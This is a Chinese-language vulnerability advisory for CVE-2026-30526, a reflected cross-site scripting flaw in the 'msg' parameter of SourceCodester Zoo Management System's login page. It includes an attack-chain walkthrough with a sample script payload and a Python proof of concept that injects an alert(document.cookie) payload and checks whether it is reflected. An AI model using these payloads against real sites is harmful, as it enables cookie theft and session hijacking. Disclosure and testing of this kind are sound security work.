CVE-2026-30526 CVSS 6.1 中危

CVE-2026-30526 Zoo管理系统反射型XSS漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30526

漏洞类型

反射型跨站脚本 (Reflected XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

SourceCodester Zoo Management System

漏洞概述

SourceCodester Zoo Management System v1.0版本在登录页面存在反射型跨站脚本（XSS）漏洞。该漏洞源于应用程序未能对`msg`参数进行有效的HTML编码或输入过滤。当攻击者构造包含恶意脚本的特制URL并诱导受害者访问时，恶意代码会被服务器反射并在受害者浏览器中执行。这可能导致窃取Cookie、会话劫持或进行钓鱼攻击，对用户数据安全构成威胁。

技术细节

该漏洞属于典型的反射型跨站脚本攻击（Reflected XSS），其根本原因在于SourceCodester Zoo Management System v1.0的登录页面缺乏对用户输入的安全处理机制。具体而言，当服务器端接收到HTTP请求中的`msg`参数时，未对其进行任何形式的HTML实体编码或安全过滤，直接将其动态拼接到响应页面的HTML源码中。攻击者可以利用这一缺陷，构造包含恶意JavaScript代码的特制URL。由于该漏洞无需身份认证（PR:N）即可触发，且影响范围为同源（S:C），攻击者常结合社会工程学手段，诱导受害者点击该恶意链接。一旦受害者访问，浏览器将解析并执行注入的脚本，导致攻击者能够窃取受害者的Session Cookie、执行未授权操作，或者通过伪造登录界面窃取凭证，严重威胁用户的数据机密性和完整性。

攻击链分析

STEP 1

侦察

攻击者识别目标系统运行的是SourceCodester Zoo Management System v1.0。

STEP 2

构造攻击载荷

攻击者构造一个包含恶意JavaScript代码的URL，利用登录页面的`msg`参数进行注入，例如?msg=<script>evil_script()</script>。

STEP 3

传递恶意链接

攻击者通过电子邮件、社交媒体或其他通讯手段，将精心构造的恶意链接发送给目标用户。

STEP 4

诱导执行

受害者被诱导点击链接。浏览器向服务器发送请求，服务器将`msg`参数内容未经过滤地反射回页面。

STEP 5

达成攻击效果

受害者的浏览器解析响应并执行恶意脚本，导致Cookie窃取、会话劫持或其他恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def verify_xss(target_url):
    # The vulnerable parameter is 'msg' on the login page
    # Using a simple script tag to test execution
    payload = '<script>alert(document.cookie)</script>'
    
    # Construct the full URL with the payload
    # Example: http://target/login.php?msg=<script>...
    params = {'msg': payload}
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        
        # Check if the payload is reflected in the response without encoding
        if payload in response.text:
            print('[+] Potential XSS found. Payload reflected unfiltered.')
            print('[+] Response URL:', response.url)
        else:
            print('[-] Payload not found in response or filtered.')
            
    except requests.exceptions.RequestException as e:
        print(f'Error connecting to target: {e}')

if __name__ == '__main__':
    # Replace with the actual target URL
    target = 'http://vulnerable-site/zms/login.php'
    verify_xss(target)

影响范围

SourceCodester Zoo Management System v1.0

防御指南

临时缓解措施

在官方补丁发布前，建议管理员暂时禁用登录页面的`msg`参数功能或实施输入过滤规则。用户应提高警惕，不要点击来源不明的链接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表